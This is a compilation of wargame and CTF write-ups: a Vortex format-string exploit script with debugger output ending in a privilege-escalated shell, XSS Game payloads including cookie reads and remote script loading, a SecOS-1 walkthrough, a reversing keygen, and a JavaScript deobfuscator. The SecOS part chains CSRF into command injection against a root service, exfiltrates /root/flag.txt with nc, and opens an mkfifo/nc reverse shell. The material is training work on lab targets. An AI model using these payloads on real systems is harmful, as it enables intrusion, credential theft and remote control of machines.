 what_b2  = (what >> 16) & mask
 what_b3  = (what >> 24) & mask

 what_b0, printed = whatprinted(what_b0, printed)
 what_b1, printed = whatprinted(what_b1, printed)
 what_b2, printed = whatprinted(what_b2, printed)
 what_b3, printed = whatprinted(what_b3, printed)

 return  struct.pack('<I',  where     ) + \
  struct.pack('<I', (where + 1)) + \
  struct.pack('<I', (where + 2)) + \
  struct.pack('<I', (where + 3)) + \
  ('%%%dc'    % what_b0  ) + \
  ('%%%d$hhn' % init     ) + \
  ('%%%dc'    % what_b1  ) + \
  ('%%%d$hhn' % (init + 1)     ) + \
  ('%%%dc'    % what_b2  ) + \
  ('%%%d$hhn' % (init + 2)     ) + \
  ('%%%dc'    % what_b3  ) + \
  ('%%%d$hhn' % (init + 3)     )

# Command-line driver: <mode> <what> <where> <printed> <init> <padding>.
# what/where are parsed as hex, the rest as decimal. 'findinit' prints a
# "%<init>$x" probe padded to the same length as the real string so the
# layout is unchanged; 'exploit' prints the fs_4writes() result. Both get
# `padding` '#' characters appended. Python 2 `print` adds a trailing newline.
if len(sys.argv) == 7:

 mode    = sys.argv[1]
 what    = int(sys.argv[2], 16)
 where   = int(sys.argv[3], 16)
 printed = int(sys.argv[4])
 init    = int(sys.argv[5])
 align   = int(sys.argv[6])

 fs = fs_4writes(what, where, printed, init)
 align = '#' * align

 if mode == 'findinit':
  pop =   '%' + str(init) + '$x'
  pop += '-' * (len(fs) - len(pop))
  payload = pop + align
 elif mode == 'exploit':
  payload = fs  + align

 # NOTE: any other mode leaves `payload` unassigned and the next line raises
 # NameError; an explicit else branch printing the usage would be clearer.
 print payload
else:
 print sys.argv[0], '<mode> <what> <where> <printed> <init> <padding>'
$ gdb /vortex/vortex4
(gdb) set disassembly-flavor intel
(gdb) disassemble main
   0x0804844d <+0>: push   ebp
   0x0804844e <+1>: mov    ebp,esp
   0x08048450 <+3>: and    esp,0xfffffff0
   0x08048453 <+6>: sub    esp,0x10
   0x08048456 <+9>: cmp    DWORD PTR [ebp+0x8],0x0 argc =? 0
   0x0804845a <+13>: je     0x8048468 <main+27>
   0x0804845c <+15>: mov    DWORD PTR [esp],0x0
   0x08048463 <+22>: call   0x8048330 <exit@plt>
   0x08048468 <+27>: mov    eax,DWORD PTR [ebp+0xc]
   0x0804846b <+30>: add    eax,0xc
   0x0804846e <+33>: mov    eax,DWORD PTR [eax]
   0x08048470 <+35>: mov    DWORD PTR [esp],eax
   0x08048473 <+38>: call   0x8048310 <printf@plt>
   0x08048478 <+43>: mov    DWORD PTR [esp],0x0
   0x0804847f <+50>: call   0x8048330 <exit@plt>
$ readelf -r /vortex/vortex4

Relocation section '.rel.dyn' at offset 0x2ac contains 1 entries:
 Offset     Info    Type            Sym.Value  Sym. Name
08049ffc  00000206 R_386_GLOB_DAT    00000000   __gmon_start__

Relocation section '.rel.plt' at offset 0x2b4 contains 4 entries:
 Offset     Info    Type            Sym.Value  Sym. Name
0804a00c  00000107 R_386_JUMP_SLOT   00000000   printf
0804a010  00000207 R_386_JUMP_SLOT   00000000   __gmon_start__
0804a014  00000307 R_386_JUMP_SLOT   00000000   exit
0804a018  00000407 R_386_JUMP_SLOT   00000000   __libc_start_main

$ ./execve /tmp/v4/getenvaddr `./format_string.py findinit 0xffffffff 0804a014 0 104 5`
EGG will be at 0xffffdf83
$ ./execve /tmp/v4/getenvaddr `./format_string.py findinit 0xffffdf83 0804a014 0 104 5`
EGG will be at 0xffffdf85
$ ./execve /vortex/vortex4 `./format_string.py findinit 0xffffdf85 0804a014 0 104 5`; echo
34303125------------------------------------------------------------##### %104 = init
$ ./execve /vortex/vortex4 `./format_string.py exploit 0xffffdf85 0804a014 0 104 5`; echo
$ whoami
vortex5
$ /bin/cat /etc/vortex_pass/vortex5
3a3456746243346c72

# XSS game area


Level 1: Hello, world of XSS

https://xss-game.appspot.com/level1/frame
query=<script>alert('xss')</script>

Level 2: Persistence is key

https://xss-game.appspot.com/level2/frame
post-content=<img src='foo' onerror='alert("xss")'>
post-content=<img src='foo' onerror='alert(document.cookie)'>
post-content=<img src='foo' onerror='s=document.createElement("script");s.src="//192.168.1.200/xss.js";document.body.appendChild(s)'>

Level 3: That sinking feeling...

https://xss-game.appspot.com/level3/frame#1
URL=https://xss-game.appspot.com/level3/frame#1' onerror='alert("xss")'>

Level 4: Context matters

https://xss-game.appspot.com/level4/frame
timer=');alert('xss

Level 5: Breaking protocol

https://xss-game.appspot.com/level5/frame
URL=https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert('xss')

Level 6: Follow the X

https://xss-game.appspot.com/level6/frame#/static/gadget.js
URL=https://xss-game.appspot.com/level6/frame#data:text/plain,alert('xss')
URL=https://xss-game.appspot.com/level6/frame#Https://192.168.1.1/xss.js
URL=https://xss-game.appspot.com/level6/frame#//192.168.1.1/xss.js

Tools

# ratproxy -w proxy.log -v traces_dir -p 8080 -d xss-game.appspot.com -lextifscgjm
# ratproxy -w proxy.log -v traces_dir -p 8080 -d xss-game.appspot.com -XC

# skipfish -b i -I xss-game.appspot.com -X /css/,/img/ -Z -o report_dir -M -E -U https://xss-game.appspot.com

References

http://tools.ietf.org/html/draft-hoehrmann-javascript-scheme-00
https://www.google.com/about/appsecurity/learning/xss/index.html
https://code.google.com/p/ratproxy/wiki/RatproxyDoc
https://code.google.com/p/skipfish/wiki/SkipfishDoc

# SecOS 1


ht# wget http://download.vulnhub.com/secos/SecOS-1.tar.gz
ht# md5sum SecOS-1.tar.gz 
e8c01ab49b98926a37f79e2ea414cfc5  SecOS-1.tar.gz
ht# tar xvzf SecOS-1.tar.gz
ht# virtualbox
<Run SecOS-1>

Grub solution

GNU GRUB
*Ubuntu
e
linux /vmlinuz-3.13.0-24-generic root=/dev/mapper/SecOS--1--vg-rot ro init=/bin/bash
F10
root@(none):/# cat /root/flag.txt | grep -m 1 flag
The flag for this first (VM) is: MickeyMustNotDie.
root@(none):/# mount -o remount,rw /
root@(none):/# passwd root
<Reboot>

CSRF solution

ht# nmap 192.168.1.1
PORT     STATE SERVICE
22/tcp   open  ssh
8081/tcp open  blackice-icecap
ht# curl --silent http://192.168.1.1:8081
---
            <!--<li><a href="/https/hacktracking.blogspot.com/hint">Wanna help?</a></li>!-->
            <li><a href="/https/hacktracking.blogspot.com/sign-up">Sign up</a></li>
            <li><a href="/https/hacktracking.blogspot.com/login">Login</a></li>
---
ht# curl --silent http://192.168.1.1:8081/hint
---
        <!--
        First: the admin visits the website (really) frequently
        Second: He runs it locally, on 127.0.0.1. 
        Third: CSRF and /(http:\/\/[-\/\.\w:0-9\?&]+)/gi, I think that's enough
        !-->
---
ht# curl --silent --request POST --data 'username=user&password=pass' http://192.168.1.1:8081/sign-up
ht# curl --silent --request POST --cookie-jar uc --cookie uc --data 'username=user&password=pass' http://192.168.1.1:8081/login
ht# curl --silent --cookie-jar uc --cookie uc http://192.168.1.1:8081/users
ht# curl --silent --request POST --cookie-jar uc --cookie uc --data 'to=spiderman&message=http://192.168.1.2:8000/csrf.html' http://192.168.1.1:8081/send-message
ht# cat csrf.html 
<html>
<body>
<form action='http://127.0.0.1:8081/change-password' method='post' name='form'>
<input name='password' value='pass'>
</form>
<script type='text/javascript'>document.form.submit();</script>
</body>
</html>
ht# python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
192.168.1.1 - - "GET /csrf.html HTTP/1.1" 200 -
ht# curl --silent --request POST --cookie-jar sc --cookie sc --data 'username=spiderman&password=pass' http://192.168.1.1:8081/login
ht# curl --silent --cookie-jar sc --cookie sc http://192.168.1.1:8081/messages | grep Well
                    <td>Well, your password is.. "CrazyPassword!". So, what do you say? </td>
ht# ssh [email protected]
[email protected]'s password:CrazyPassword!
spiderman@SecOS-1:~$ crontab -e
* * * * * /opt/phantomjs/bin/phantomjs /home/spiderman/vnwa/scripts/admin.js
spiderman@SecOS-1:~$ ps axuf | grep sudo
sudo -u spiderman sh -c /usr/local/bin/node /home/spiderman/vnwa/server.js
sudo -u root sh -c /usr/local/bin/node /home/spiderman/vnwa/internalServer.js
spiderman@SecOS-1:~$ cat /home/spiderman/vnwa/internalServer.js
// internalServer.js — the "ping" helper that the ps output above shows running as
// root (`sudo -u root sh -c /usr/local/bin/node .../internalServer.js`).
// The file is listed exactly as found; the comments mark what the exploit relies on.
var fs = require('fs');
var express = require('express');
var http = require('http');
var sys = require('sys')
var exec = require('child_process').exec; // exec() runs its argument through a shell
var crypto = require('crypto');

var utils = require('./lib/utils.js');
var model = require('./lib/model.js');

var app = express();
var server = http.createServer(app); 

// Logs the client address and requested path for every request, then continues.
var logger = function (req, res, next) {
    console.log(req.connection.remoteAddress + " tried to access : " + req.url);
    next(); // Passing the request to the next handler in the stack.
}

// Configuration
app.configure(function () {
    // Session management
    app.use(express.cookieParser());
    // Hard-coded session secret, readable by anyone who can read this file (the
    // spiderman user can, per the cat above): enough to forge signed session cookies.
    app.use(express.session({secret: 'privateKeyForSession'}));
    app.use("/js", express.static(__dirname + '/public/js')); // javascript folder
    app.use("/css", express.static(__dirname + '/public/css')); // css folder

    app.set('views', __dirname + '/views'); // views folder
    app.set('view engine', 'ejs'); // view engine for this projet : ejs 

    app.use(express.bodyParser()); // for POST Requests
    app.use(logger); // Here you add your logger to the stack.
    app.use(app.router); // The Express routes handler.
});


// Renders the ping form. No authentication is enforced here; the session flags are
// only passed to the template.
app.get('/', function (req, res) {
    res.render('ping.ejs', {
        isConnected: req.session.isConnected,
        isAdmin: req.session.isAdmin
    });
});

// Ping handler (the original comment read "Update password", which is stale).
// No authentication check: the plain curl POST below, sent without any cookie, reaches exec().
app.post('/', function (req, res) {
    ip = req.body.ip // assigned without var: leaks into the global scope
    if (ip == "") {
        utils.redirect(req, res, '/ping-status');
    } else {
        // getting the command with req.params.command
        var child;
        // console.log(req.params.command);
        // OS command injection: the user-controlled `ip` is concatenated into a shell
        // command line and handed to child_process.exec with no validation, and this
        // process runs as root, so a ';' in `ip` runs arbitrary commands as root (see
        // the nc exfiltration and the reverse shell below). A safe version would
        // validate `ip` as an address and use execFile('ping', ['-c', '1', ip]).
        child = exec('ping ' + ip, function (error, stdout, stderr) {
            // Only stdout is rendered; error and stderr are discarded, so an injected
            // command has to write to stdout or exfiltrate out of band.
            res.render('ping.ejs', {
                isConnected: req.session.isConnected,
                message: stdout,
                isAdmin: req.session.isAdmin
            });
        });
    }
});

// Bound to loopback only: the sole barrier, and the attacker already has a local
// shell as spiderman at this point.
server.listen(9000, '127.0.0.1', function() {
  console.log("Listening on port 9000");
});
spiderman@SecOS-1:~$ curl --silent --request POST --data 'ip=-c 1 127.0.0.1; nc 192.168.1.2 1234 < /root/flag.txt' http://127.0.0.1:9000
ht# ncat -l 192.168.1.2 1234 | grep -m 1 flag
The flag for this first (VM) is: MickeyMustNotDie.
spiderman@SecOS-1:~$ function encode { echo -n "$1" | xxd -p | tr -d '\n' | sed 's/\(..\)/%\1/g'; }  # percent-encode every byte: the next payload contains '&' (in 2>&1), which a raw curl --data body would be split on as a form-field separator
spiderman@SecOS-1:~$ encoded=`encode '-c 1 127.0.0.1; if [ ! -p /tmp/f ]; then mkfifo /tmp/f; fi ; cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.1.2 1234 > /tmp/f'`
spiderman@SecOS-1:~$ curl --silent --request POST --data "ip=$encoded" http://127.0.0.1:9000
ht# ncat -l 192.168.1.2 1234
# hostname
SecOS-1
# whoami
root

# SecurityArtWork: Reversing challenge


# wget --quiet http://www.securityartwork.es/wp-content/uploads/2013/11/serial.exe
# file serial.exe
serial.exe: PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
- Breakpoints
004019B5  |. E8 F6FCFFFF               CALL serial.004016B0
00401776   . 83E8 0F                   SUB EAX,0F
004018FA   . 39C2                      CMP EDX,EAX
- Key function
004018D2   . 8B45 F8                   MOV EAX,DWORD PTR SS:[EBP-8]
004018D5   . 83C0 01                   ADD EAX,1
004018D8   . 8B0485 00404000           MOV EAX,DWORD PTR DS:[EAX*4+404000]
004018DF   . 8B1485 40704000           MOV EDX,DWORD PTR DS:[EAX*4+407040]
004018E6   . 8B45 F8                   MOV EAX,DWORD PTR SS:[EBP-8]
004018E9   . 83C0 02                   ADD EAX,2
004018EC   . 8B0485 00404000           MOV EAX,DWORD PTR DS:[EAX*4+404000]
004018F3   . 8B0485 40704000           MOV EAX,DWORD PTR DS:[EAX*4+407040]
004018FA   . 39C2                      CMP EDX,EAX
004018FC   . 75 0C                     JNZ SHORT serial.0040190A

# cat serial.py
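#!/usr/bin/python
"""Recover a serial accepted by serial.exe.

The author reduced the key routine disassembled above to one rule per
position: (i * digit) % 10 == check[i], where i is the 0-based position.
Each position can therefore be solved on its own by trying the ten digits.

The original script silently skipped a position when no digit fitted and
printed a too-short serial; serial_key() raises ValueError instead.
"""

# Expected residue for each of the 16 serial positions.
check = [0,4,6,0,6,0,0,5,6,3,0,5,6,9,2,5]


def serial_key(check):
    """Return the lowest-digit serial satisfying ``check``.

    Args:
        check: expected residues, one per serial position.
    Returns:
        A string of len(check) decimal digits.
    Raises:
        ValueError: when some position i has no digit d with
            (i * d) % 10 == check[i] (e.g. an odd residue at an even position).
    """
    digits = []
    for i, expected in enumerate(check):
        for d in range(10):
            if i * d % 10 == expected:
                digits.append(str(d))
                break
        else:  # no digit matched: the original would just drop this position
            raise ValueError("position %d: no digit gives residue %d" % (i, expected))
    return "".join(digits)


# Kept as a module-level name, as in the original script.
key = serial_key(check)

if __name__ == "__main__":
    print(key)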
# ./serial.py
0430400527053331
# cat serials.py
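#!/usr/bin/python
"""Enumerate every serial accepted by serial.exe's check.

Same per-position rule as serial.py: (i * digit) % 10 == check[i].
Several positions admit more than one digit (every digit works where
i % 10 == 0), so a depth-first walk over the positions lists all of them.

Changes from the original: the recursion depth is taken from len(check)
instead of the hard-coded 15, the Python 2 print statement is replaced by a
call, and serials() exposes the results as a generator so they can be
consumed without printing.
"""

check = [0,4,6,0,6,0,0,5,6,3,0,5,6,9,2,5]


def serials(check):
    """Yield every digit string satisfying ``check``, in lexicographic order.

    Args:
        check: expected residues, one per serial position.
    Yields:
        Strings of len(check) digits; nothing if a position is unsatisfiable.
    """
    n = len(check)

    def walk(prefix, p):
        if p == n:
            yield prefix
            return
        for d in range(10):
            if p * d % 10 == check[p]:
                for s in walk(prefix + str(d), p + 1):
                    yield s

    return walk("", 0)


def serial(key, p):
    """Print every serial that extends ``key`` from position ``p`` on.

    Original entry point, kept with its signature: ``key`` holds the first
    p digits already chosen and the module-level ``check`` is consulted.
    """
    last = len(check) - 1
    for n in range(10):
        if p * n % 10 == check[p]:
            if p < last:
                serial(key + str(n), p + 1)
            else:
                print(key + str(n))


if __name__ == "__main__":
    serial("", 0)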

C:\> serial.exe 0430400527053331
Valid serial number :-)

# W0PR wargame


# curl --silent --output wargame.html http://w0pr.net
# sed -n 's/.*<script>\(.*\)<\/script>.*/\1/p' wargame.html > source.js
# cat dehieroglyphy
#!/bin/bash
# dehieroglyphy — undo the "hieroglyphy" JavaScript encoding (reference below).
# The encoder spells every character out of the symbols [ ] ( ) ! + { }, so
# this decoder textually replaces each known spelling with the character it
# denotes, most specific spellings first, via a chain of sed -i passes.
#
# Usage: dehieroglyphy FILE      (writes FILE.decoded and prints it)
#
# Review notes — the code is left exactly as it was run:
#  - $ifile, $ofile and every `escape $var` argument are unquoted. The
#    spellings contain '[' and ']', which the shell treats as glob characters,
#    so a file in the working directory that happens to match a spelling would
#    be substituted for it. "$ifile" and "$(escape "$var")" would remove that.
#  - The substitution ORDER matters: a spelling must be replaced before the
#    shorter spellings it is built from (e.g. character_plus before
#    character_1, and every character_N before its number_N). Reordering the
#    sed lines changes the output.

ifile="$1"
ofile="$ifile.decoded"

cp $ifile $ofile

# Escape the characters of the encoder's alphabet that are special in a sed
# basic regex: '[' and ']' (bracket expressions) and ' ' (only because the
# argument is passed unquoted and re-joined by `echo $*`; single spaces
# survive that round trip). + ! ( ) { } are literals in a BRE, so they are
# left alone.
function escape(){
        echo $* | sed -e "s/\[/\\\[/g" -e "s/\]/\\\]/g" -e "s/ /\\\ /g"
}

# Numbers: +[] is 0, +!![] is 1, and each further +!![] adds one.
number_0='+[]'
number_1='+!![]'
number_2='!+[]+!![]'
number_3='!+[]+!![]+!![]'
number_4='!+[]+!![]+!![]+!![]'
number_5='!+[]+!![]+!![]+!![]+!![]'
number_6='!+[]+!![]+!![]+!![]+!![]+!![]'
number_7='!+[]+!![]+!![]+!![]+!![]+!![]+!![]'
number_8='!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]'
number_9='!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]'

# Digit characters: (N+[]) coerces the number N to its one-character string.
character_0="($number_0+[])"
character_1="($number_1+[])"
character_2="($number_2+[])"
character_3="($number_3+[])"
character_4="($number_4+[])"
character_5="($number_5+[])"
character_6="($number_6+[])"
character_7="($number_7+[])"
character_8="($number_8+[])"
character_9="($number_9+[])"

# Base strings whose characters are harvested by indexing:
#   []+{}  -> "[object Object]"   +{}+[]    -> "NaN"
#   !![]+[] -> "true"             ![]+[]    -> "false"
#   [][[]]+[] -> "undefined"
_object_Object='[]+{}'
_NaN='+{}+[]'
_true='!![]+[]'
_false='![]+[]'
_undefined='[][[]]+[]'

# Single characters picked out of the base strings by index, e.g.
# ("[object Object]")[7] is the space and ("undefined")[2] is 'd'.
character_blank="($_object_Object)[$number_7]"
character_leftsquarebracket="($_object_Object)[$number_0]"
character_rightsquarebracket="($_object_Object)[$character_1+$character_4]"
character_a="($_NaN)[$number_1]"
character_b="($_object_Object)[$number_2]"
character_c="($_object_Object)[$number_5]"
character_d="($_undefined)[$number_2]"
character_e="($_undefined)[$number_3]"
character_f="($_undefined)[$number_4]"
character_i="($_undefined)[$number_5]"
character_j="($_object_Object)[$number_3]"
character_l="($_false)[$number_2]"
character_n="($_undefined)[$number_1]"
character_o="($_object_Object)[$number_1]"
character_r="($_true)[$number_1]"
character_s="($_false)[$number_3]"
character_t="($_true)[$number_0]"
character_u="($_undefined)[$number_0]"
character_N="($_NaN)[$number_0]"
character_O="($_object_Object)[$number_8]"

# +("1e1000")+[] overflows to "Infinity": source of 'y' (index 7) and 'I' (index 0).
_Infinity="+($number_1+$character_e+$character_1+$character_0+$character_0+$character_0)+[]"

character_y="($_Infinity)[$number_7]"
character_I="($_Infinity)[$number_0]"

# +("1e100")+[] stringifies as "1e+100": source of '+' (index 2).
_1e100="+($number_1+$character_e+$character_1+$character_0+$character_0)+[]"
character_plus="($_1e100)[$number_2]"

# Pass 1: longest spellings first so a composite spelling is consumed before
# the shorter spellings it contains. Do not reorder.
sed -i "s/`escape $character_plus`/+/g" $ofile
sed -i "s/`escape $character_I`/I/g" $ofile
sed -i "s/`escape $character_y`/y/g" $ofile
sed -i "s/`escape $character_O`/O/g" $ofile
sed -i "s/`escape $character_N`/N/g" $ofile
sed -i "s/`escape $character_u`/u/g" $ofile
sed -i "s/`escape $character_t`/t/g" $ofile
sed -i "s/`escape $character_s`/s/g" $ofile
sed -i "s/`escape $character_r`/r/g" $ofile
sed -i "s/`escape $character_o`/o/g" $ofile
sed -i "s/`escape $character_n`/n/g" $ofile
sed -i "s/`escape $character_l`/l/g" $ofile
sed -i "s/`escape $character_j`/j/g" $ofile
sed -i "s/`escape $character_i`/i/g" $ofile
sed -i "s/`escape $character_f`/f/g" $ofile
sed -i "s/`escape $character_e`/e/g" $ofile
sed -i "s/`escape $character_d`/d/g" $ofile
sed -i "s/`escape $character_c`/c/g" $ofile
sed -i "s/`escape $character_b`/b/g" $ofile
sed -i "s/`escape $character_a`/a/g" $ofile
sed -i "s/`escape $character_rightsquarebracket`/]/g" $ofile
sed -i "s/`escape $character_leftsquarebracket`/[/g" $ofile
sed -i "s/`escape $character_blank`/ /g" $ofile
sed -i "s/`escape $character_9`/9/g" $ofile
sed -i "s/`escape $character_8`/8/g" $ofile
sed -i "s/`escape $character_7`/7/g" $ofile
sed -i "s/`escape $character_6`/6/g" $ofile
sed -i "s/`escape $character_5`/5/g" $ofile
sed -i "s/`escape $character_4`/4/g" $ofile
sed -i "s/`escape $character_3`/3/g" $ofile
sed -i "s/`escape $character_2`/2/g" $ofile
sed -i "s/`escape $character_1`/1/g" $ofile
sed -i "s/`escape $character_0`/0/g" $ofile
sed -i "s/`escape $number_9`/9/g" $ofile
sed -i "s/`escape $number_8`/8/g" $ofile
sed -i "s/`escape $number_7`/7/g" $ofile
sed -i "s/`escape $number_6`/6/g" $ofile
sed -i "s/`escape $number_5`/5/g" $ofile
sed -i "s/`escape $number_4`/4/g" $ofile
sed -i "s/`escape $number_3`/3/g" $ofile
sed -i "s/`escape $number_2`/2/g" $ofile
sed -i "s/`escape $number_1`/1/g" $ofile

# Pass 2: spellings that go through the Function constructor. They are
# written with the letters already decoded by pass 1 (s+o+r+t, ...), so they
# can only match after it. []["sort"]["constructor"] is Function, and
# Function("return location")() coerced to a string is the page URL, from
# which 'h', 'p' and '/' are taken at offsets 0, 3 and 6 of "http://".
functionConstructor="[][s+o+r+t][c+o+n+s+t+r+u+c+t+o+r]"
returnLocation="([]+$functionConstructor(r+e+t+u+r+n+ +l+o+c+a+t+i+o+n)())"
character_h="$returnLocation[0]"
character_p="$returnLocation[3]"
character_slash="$returnLocation[6]"

sed -i "s/`escape $character_h`/h/g" $ofile
sed -i "s/`escape $character_p`/p/g" $ofile
sed -i "s/`escape $character_slash`/\//g" $ofile

_unescape="$functionConstructor(r+e+t+u+r+n+ +u+n+e+s+c+a+p+e)()"
_escape="$functionConstructor(r+e+t+u+r+n+ +e+s+c+a+p+e)()"

# escape("[")[0] is '%', the prefix that the unescape("%XX") spellings need.
character_percentage="$_escape([)[+[]]"
sed -i "s/`escape $character_percentage`/%/g" $ofile

# Pass 3: every remaining character was encoded as unescape("%" + i + j) with
# hex digits i j; decode bytes 0x20..0x7e. The inner range stops at 'e', so
# no 0x?f byte is tried — which, for 0x2f, keeps '/' out of the sed
# replacement, where it would end the s/// command (possibly deliberate).
# 0x26 ('&') is passed unescaped and sed would read it as "the matched text".
# Neither limit affects the sample decoded below, which reaches none of
# those bytes through unescape.
for i in {2..7}; do
        for j in {0..9} {a..e}; do
                char=`printf "\x$i$j\n"`
                if [ "$char" == '\' ]; then char='\\'; fi   # backslash must be doubled in a sed replacement
                match="$_unescape(%+$i+$j)"
                sed -i "s/`escape $match`/$char/g" $ofile
        done
done

# Final cleanup: name the Function constructor and drop the '+' operators
# that joined the single-character pieces. Note this also strips any genuine
# '+' in the decoded program.
sed -i "s/`escape $functionConstructor`/Function/" $ofile
sed -i "s/+//g" $ofile

cat $ofile
# ./dehieroglyphy source.js
Function(setInterval(function(){var a = document.getElementById('blinking');if (a.style.display == 'none') a.style.display = 'inline';else a.style.display = 'none';}, 500 );)()
References

https://github.com/alcuadrado/hieroglyphy/blob/master/hieroglyphy.js

# NcN CTF Quals 2k13


Access Level 1

# curl http://ctf.noconname.org/4cbe48a830c4cd2d4ac9e6e9373e3055/index.html
<!DOCTYPE html>
<html>
  <head>
    <title>NcN 2013 Registration Quals</title>
                <link rel="stylesheet" href="../res/main.css" type="text/css" media="screen"/>
    <link href='../res/UbuntuMono.css' rel='stylesheet' type='text/css'>
    <meta content="Javier Marcos @javutin" name="author" />
        <script type="text/javascript" src="crypto.js"></script>
        </head>
<body>
        <div id="level">
        <center>
                <h2 style="color: white">Discover the buried valid key:</h2>
    <form action="login.php" method="POST" onsubmit="return encrypt(this);">
    <table border=0 align="center">
     <tr>
        <td><label style="color: white" for="key"><b>Key: </b></label></td>
        <td><input type="text" name="password" id="password" class="input"></td>
                                        <input type="hidden" name="key" id="key" value="">
                                        <input type="hidden" name="verification" id="verification" value="yes">
     </tr>
     <tr>
        <td colspan="2" align="center"><p><input type="submit" name="send" class="button" value="Send"></p></td>
     </tr>
    </table>
    </form>
        </center>
        </div>
</body>
</html>
# curl --silent http://ctf.noconname.org/4cbe48a830c4cd2d4ac9e6e9373e3055/crypto.js | sed 's/eval/console.log/'
var _0x52ae=["\x66\x20\x6F\x28\x38\x29\x7B\x63\x20\x69\x2C\x6A\x3D\x30\x3B\x6B\x28\x69\x3D\x30\x3B\x69\x3C\x38\x2E\x6C\x3B\x69\x2B\x2B\x29\x7B\x6A\x2B\x3D\x28\x38\x5B\x69\x5D\x2E\x73\x28\x29\x2A\x28\x69\x2B\x31\x29\x29\x7D\x67\x20\x74\x2E\x75\x28\x6A\x29\x25\x76\x7D\x66\x20\x70\x28\x68\x29\x7B\x68\x3D\x68\x2E\x71\x28\x30\x29\x3B\x63\x20\x69\x3B\x6B\x28\x69\x3D\x30\x3B\x69\x3C\x77\x3B\x2B\x2B\x69\x29\x7B\x63\x20\x35\x3D\x69\x2E\x78\x28\x79\x29\x3B\x6D\x28\x35\x2E\x6C\x3D\x3D\x31\x29\x35\x3D\x22\x30\x22\x2B\x35\x3B\x35\x3D\x22\x25\x22\x2B\x35\x3B\x35\x3D\x7A\x28\x35\x29\x3B\x6D\x28\x35\x3D\x3D\x68\x29\x41\x7D\x67\x20\x69\x7D\x66\x20\x6E\x28\x38\x29\x7B\x63\x20\x69\x2C\x61\x3D\x30\x2C\x62\x3B\x6B\x28\x69\x3D\x30\x3B\x69\x3C\x38\x2E\x6C\x3B\x2B\x2B\x69\x29\x7B\x62\x3D\x70\x28\x38\x2E\x71\x28\x69\x29\x29\x3B\x61\x2B\x3D\x62\x2A\x28\x69\x2B\x31\x29\x7D\x67\x20\x61\x7D\x66\x20\x42\x28\x39\x29\x7B\x63\x20\x32\x3B\x32\x3D\x6E\x28\x39\x2E\x64\x2E\x65\x29\x3B\x32\x3D\x32\x2A\x28\x33\x2B\x31\x2B\x33\x2B\x33\x2B\x37\x29\x3B\x32\x3D\x32\x3E\x3E\x3E\x36\x3B\x32\x3D\x32\x2F\x34\x3B\x32\x3D\x32\x5E\x43\x3B\x6D\x28\x32\x21\x3D\x30\x29\x7B\x72\x28\x27\x44\x20\x64\x21\x27\x29\x7D\x45\x7B\x72\x28\x27\x46\x20\x64\x20\x3A\x29\x27\x29\x7D\x39\x2E\x47\x2E\x65\x3D\x6E\x28\x39\x2E\x64\x2E\x65\x29\x3B\x39\x2E\x48\x2E\x65\x3D\x22\x49\x22\x2B\x6F\x28\x39\x2E\x64\x2E\x65\x29\x3B\x67\x20\x4A\x7D","\x7C","\x73\x70\x6C\x69\x74","\x7C\x7C\x72\x65\x73\x7C\x7C\x7C\x68\x65\x78\x5F\x69\x7C\x7C\x7C\x73\x74\x72\x7C\x66\x6F\x72\x6D\x7C\x7C\x7C\x76\x61\x72\x7C\x70\x61\x73\x73\x77\x6F\x72\x64\x7C\x76\x61\x6C\x75\x65\x7C\x66\x75\x6E\x63\x74\x69\x6F\x6E\x7C\x72\x65\x74\x75\x72\x6E\x7C\x66\x6F\x6F\x7C\x7C\x68\x61\x73\x68\x7C\x66\x6F\x72\x7C\x6C\x65\x6E\x67\x74\x68\x7C\x69\x66\x7C\x6E\x75\x6D\x65\x72\x69\x63\x61\x6C\x5F\x76\x61\x6C\x75\x65\x7C\x73\x69\x6D\x70\x6C\x65\x48\x61\x73\x68\x7C\x61\x73\x63\x69\x69\x5F\x6F\x6E\x65\x7C\x63\x68\x61\x72\x41\x74\x7C\x61\x6C\x65\x72\x74\x7C\x63\x68\x61\x72\x43\x6F\x64\x65\x41\
x74\x7C\x4D\x61\x74\x68\x7C\x61\x62\x73\x7C\x33\x31\x33\x33\x37\x7C\x32\x35\x36\x7C\x74\x6F\x53\x74\x72\x69\x6E\x67\x7C\x31\x36\x7C\x75\x6E\x65\x73\x63\x61\x70\x65\x7C\x62\x72\x65\x61\x6B\x7C\x65\x6E\x63\x72\x79\x70\x74\x7C\x34\x31\x35\x33\x7C\x49\x6E\x76\x61\x6C\x69\x64\x7C\x65\x6C\x73\x65\x7C\x43\x6F\x72\x72\x65\x63\x74\x7C\x6B\x65\x79\x7C\x76\x65\x72\x69\x66\x69\x63\x61\x74\x69\x6F\x6E\x7C\x79\x65\x73\x7C\x74\x72\x75\x65","","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x72\x65\x70\x6C\x61\x63\x65","\x5C\x77\x2B","\x5C\x62","\x67"];console.log(function (_0x7038x1,_0x7038x2,_0x7038x3,_0x7038x4,_0x7038x5,_0x7038x6){_0x7038x5=function (_0x7038x3){return (_0x7038x3<_0x7038x2?_0x52ae[4]:_0x7038x5(parseInt(_0x7038x3/_0x7038x2)))+((_0x7038x3=_0x7038x3%_0x7038x2)>35?String[_0x52ae[5]](_0x7038x3+29):_0x7038x3.toString(36));} ;if(!_0x52ae[4][_0x52ae[6]](/^/,String)){while(_0x7038x3--){_0x7038x6[_0x7038x5(_0x7038x3)]=_0x7038x4[_0x7038x3]||_0x7038x5(_0x7038x3);} ;_0x7038x4=[function (_0x7038x5){return _0x7038x6[_0x7038x5];} ];_0x7038x5=function (){return _0x52ae[7];} ;_0x7038x3=1;} ;while(_0x7038x3--){if(_0x7038x4[_0x7038x3]){_0x7038x1=_0x7038x1[_0x52ae[6]]( new RegExp(_0x52ae[8]+_0x7038x5(_0x7038x3)+_0x52ae[8],_0x52ae[9]),_0x7038x4[_0x7038x3]);} ;} ;return _0x7038x1;} (_0x52ae[0],46,46,_0x52ae[3][_0x52ae[2]](_0x52ae[1]),0,{}));
# node
